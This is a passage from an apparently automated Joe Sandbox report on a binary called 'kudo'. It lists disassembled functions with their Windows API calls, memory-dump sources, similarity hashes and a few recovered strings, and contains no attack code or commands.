                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                      • String ID:
                                                      • API String ID: 2833360925-0
                                                      • Opcode ID: a0f5cd344a5c0e8a62ab94390395c6fdf5cd489d9b83c15ca27ed08e5248ec43
                                                      • Instruction ID: 27c26058e424a12ffbe2ff7c19bab39167ae1bc375c7802628a892dc8f9d335b
                                                      • Opcode Fuzzy Hash: a0f5cd344a5c0e8a62ab94390395c6fdf5cd489d9b83c15ca27ed08e5248ec43
                                                      • Instruction Fuzzy Hash: 51016935D01A2DDBCF00EFE8EC98AEDBB78FB09711F420456EA41F2241CB30555087A1
                                                      Function 0085810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00858121
                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0085812B
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0085813A
                                                      • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00858141
                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00858157
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 47921759-0
                                                      • Opcode ID: 1764e7c3c9f7d2c7e37326f8d390fe087ca66729950041b03bc5c01cbe92284f
                                                      • Instruction ID: c5e79cc090830bcf725f8005db424d0e08c922595e0de9364a10f930922bc8b4
                                                      • Opcode Fuzzy Hash: 1764e7c3c9f7d2c7e37326f8d390fe087ca66729950041b03bc5c01cbe92284f
                                                      • Instruction Fuzzy Hash: 0BF0C274240704EFEB120FA9EC8CE673BACFF49755F500026FA45D2151DB609C05DB60
                                                      Function 0085C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003E9), ref: 0085C1F7
                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 0085C20E
                                                      • MessageBeep.USER32(00000000), ref: 0085C226
                                                      • KillTimer.USER32(?,0000040A), ref: 0085C242
                                                      • EndDialog.USER32(?,00000001), ref: 0085C25C
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                      • String ID:
                                                      • API String ID: 3741023627-0
                                                      • Opcode ID: 775f5326922055e93abb1320e9efc961f026959adcd33b6fab137c65ff27061c
                                                      • Instruction ID: 05c9559eb3b6c41ffcdd8eeea9c1654cf896531e4619c372fc740abd71496aab
                                                      • Opcode Fuzzy Hash: 775f5326922055e93abb1320e9efc961f026959adcd33b6fab137c65ff27061c
                                                      • Instruction Fuzzy Hash: C2018B305047049BEB209B54DD4EF967778FF10707F000669FA52E14E1DBF469989F50
                                                      Function 008013B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                      • String ID:
                                                      • API String ID: 2625713937-0
                                                      • Opcode ID: 342b1104d8029470f51018a5ba142a1dc88cf844b1360b8fa42a8a037f36ca14
                                                      • Instruction ID: 5d05edf4ad257f72b2dfa276c395b266e09ce4701d1822b65afdd0da70c233a8
                                                      • Opcode Fuzzy Hash: 342b1104d8029470f51018a5ba142a1dc88cf844b1360b8fa42a8a037f36ca14
                                                      • Instruction Fuzzy Hash: 02F0C430004A08EFDF525F2AEC4CB593BB5FB11326F188234E529891F2CB3599A5DF54
                                                      Function 00858992 Relevance: 7.5, APIs: 5, Instructions: 23memorysynchronizationCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0085899D
                                                      • CloseHandle.KERNEL32(?), ref: 008589B2
                                                      • CloseHandle.KERNEL32(?), ref: 008589BA
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 008589C3
                                                      • HeapFree.KERNEL32(00000000), ref: 008589CA
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: CloseHandleHeap$FreeObjectProcessSingleWait
                                                      • String ID:
                                                      • API String ID: 3751786701-0
                                                      • Opcode ID: 1be80210c2a147173eae54327cc4dfadf52303a739a0b1e1204c23580c91cdc9
                                                      • Instruction ID: 11dce0fd5d95037e7ff03ff19f0fa67973d6a28614056f37c349a9840020fa74
                                                      • Opcode Fuzzy Hash: 1be80210c2a147173eae54327cc4dfadf52303a739a0b1e1204c23580c91cdc9
                                                      • Instruction Fuzzy Hash: 49E0527A104505FBDA022FE9EC0C95ABB69FB89762B508631F319C1575CB32A461DB50
                                                      Function 00812CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00820DB6: std::exception::exception.LIBCMT ref: 00820DEC
                                                        • Part of subcall function 00820DB6: __CxxThrowException@8.LIBCMT ref: 00820E01
                                                        • Part of subcall function 00807DE1: _memmove.LIBCMT ref: 00807E22
                                                        • Part of subcall function 00807A51: _memmove.LIBCMT ref: 00807AAB
                                                      • __swprintf.LIBCMT ref: 00812ECD
                                                      Strings
                                                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00812D66
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                      • API String ID: 1943609520-557222456
                                                      • Opcode ID: c73141a200ba9c1971b03f8f435bacff2055803b1842cffa19091c4e5fd0dc43
                                                      • Instruction ID: 275dc50031a3f2983f706be68cd186a1fd463cd7f426da5d7cede5d995a853f7
                                                      • Opcode Fuzzy Hash: c73141a200ba9c1971b03f8f435bacff2055803b1842cffa19091c4e5fd0dc43
                                                      • Instruction Fuzzy Hash: B5916B715082159FCB14EF28D885CAFB7A8FF95720F00491DF495DB2A2EA20ED94CB53
                                                      Function 0086B93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00804750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00804743,?,?,008037AE,?), ref: 00804770
                                                      • CoInitialize.OLE32(00000000), ref: 0086B9BB
                                                      • CoCreateInstance.OLE32(00892D6C,00000000,00000001,00892BDC,?), ref: 0086B9D4
                                                      • CoUninitialize.OLE32 ref: 0086B9F1
                                                        • Part of subcall function 00809837: __itow.LIBCMT ref: 00809862
                                                        • Part of subcall function 00809837: __swprintf.LIBCMT ref: 008098AC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                      • String ID: .lnk
                                                      • API String ID: 2126378814-24824748
                                                      • Opcode ID: e74bc18fae3bf1b95c1a7887de0dc9bdd2a68814819160b159dfa650e1479c1f
                                                      • Instruction ID: 0dbbad2cfdf70183c2f074088b4824ee9e498066706b491fd2c47b4534cabcbe
                                                      • Opcode Fuzzy Hash: e74bc18fae3bf1b95c1a7887de0dc9bdd2a68814819160b159dfa650e1479c1f
                                                      • Instruction Fuzzy Hash: 73A126756042059FCB00DF18C885D5ABBE5FF89328F158958F899DB3A2CB31ED85CB92
                                                      Function 0082501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __startOneArgErrorHandling.LIBCMT ref: 008250AD
                                                        • Part of subcall function 008300F0: __87except.LIBCMT ref: 0083012B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ErrorHandling__87except__start
                                                      • String ID: pow
                                                      • API String ID: 2905807303-2276729525
                                                      • Opcode ID: 9be3554078011b427a50aca86d879f8e7f338be5b4d296976c01e215d58a53f0
                                                      • Instruction ID: 152adac39516eaebb9d5647bd6fcfb67cf1eacc5da16c4825a9252736c1e8bce
                                                      • Opcode Fuzzy Hash: 9be3554078011b427a50aca86d879f8e7f338be5b4d296976c01e215d58a53f0
                                                      • Instruction Fuzzy Hash: D551996094CA0696DB127728EC2137F3B94FB80700F248D5AE4D5C62AAEE348DD4DFC2
                                                      Function 00816192 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: _memset$_memmove
                                                      • String ID: ERCP
                                                      • API String ID: 2532777613-1384759551
                                                      • Opcode ID: 3c98c98d2feaee1ab4289fa2387999993337754541671002a56d605814254c3b
                                                      • Instruction ID: 26f626343a63f808504c99373e7dbd1001cf3ca0762e92d0e70f0cbbfb202898
                                                      • Opcode Fuzzy Hash: 3c98c98d2feaee1ab4289fa2387999993337754541671002a56d605814254c3b
                                                      • Instruction Fuzzy Hash: EF519071900709DBDB24CF95C9817EAB7F8FF04314F20456EE98AD7251E770AA94CB41
                                                      Function 008597F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 008614BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00859296,?,?,00000034,00000800,?,00000034), ref: 008614E6
                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0085983F
                                                        • Part of subcall function 00861487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,008592C5,?,?,00000800,?,00001073,00000000,?,?), ref: 008614B1
                                                        • Part of subcall function 008613DE: GetWindowThreadProcessId.USER32(?,?), ref: 00861409
                                                        • Part of subcall function 008613DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0085925A,00000034,?,?,00001004,00000000,00000000), ref: 00861419
                                                        • Part of subcall function 008613DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0085925A,00000034,?,?,00001004,00000000,00000000), ref: 0086142F
                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008598AC
                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008598F9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                      • String ID: @
                                                      • API String ID: 4150878124-2766056989
                                                      • Opcode ID: d495c7617b25856ee7e55038171bdc543c9597c126714deed70f4e39a309e2f6
                                                      • Instruction ID: 0b6e8f1c62e4ffadd75b6ec76319b5b2bac603a5fe3da6e1fcfbefee785a8977
                                                      • Opcode Fuzzy Hash: d495c7617b25856ee7e55038171bdc543c9597c126714deed70f4e39a309e2f6
                                                      • Instruction Fuzzy Hash: 56413076A00218BFDF10DFA8CD45ADEBBB8FB05300F144199FA45B7151DA716E49CBA1
                                                      Function 00887946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 008879DF
                                                      • GetWindowLongW.USER32 ref: 008879FC
                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00887A0C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Window$Long
                                                      • String ID: SysTreeView32
                                                      • API String ID: 847901565-1698111956
                                                      • Opcode ID: 9db14f8df794ff4b094c34dc85463c99cd842cdf70d5a53cc7628294b9591839
                                                      • Instruction ID: 16df269494dbf4f5c7f6bc057da27c4383780476dcd545750249eb35778d4d8c
                                                      • Opcode Fuzzy Hash: 9db14f8df794ff4b094c34dc85463c99cd842cdf70d5a53cc7628294b9591839
                                                      • Instruction Fuzzy Hash: D331DC31204606ABDB15AF38CC45BEA7BA9FB09334F204725F975E22E1D734ED919B50
                                                      Function 008873D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00887461
                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00887475
                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00887499
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window
                                                      • String ID: SysMonthCal32
                                                      • API String ID: 2326795674-1439706946
                                                      • Opcode ID: 0dea5172c6513e79bdd1c179d6e7bfc611c736619b591da2c3b4a7d57bb5a566
                                                      • Instruction ID: a10da7a6da206fb4ab365efef056fb54f32650bc3639fcfb6e9347f25e4e545a
                                                      • Opcode Fuzzy Hash: 0dea5172c6513e79bdd1c179d6e7bfc611c736619b591da2c3b4a7d57bb5a566
                                                      • Instruction Fuzzy Hash: 7B218D32500218ABDF11DEA4CC46FEA3B79FB48724F210214FE55AB191DA75E8919BA0
                                                      Function 00886CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00886D3B
                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00886D4B
                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00886D70
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$MoveWindow
                                                      • String ID: Listbox
                                                      • API String ID: 3315199576-2633736733
                                                      • Opcode ID: f871f807e46ff7d170e030b0929ea6a49a32e855e5bdf24e81157c19fd404229
                                                      • Instruction ID: 9b2dcd002ca2ae324365e9be02416b0a60ea666613fbdd4e99a51102efff0245
                                                      • Opcode Fuzzy Hash: f871f807e46ff7d170e030b0929ea6a49a32e855e5bdf24e81157c19fd404229
                                                      • Instruction Fuzzy Hash: B6219532610118BFDF119F54DC45FBB377AFF89760F118124FA459B190D671AC6187A0
                                                      Function 0088770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00887772
                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00887787
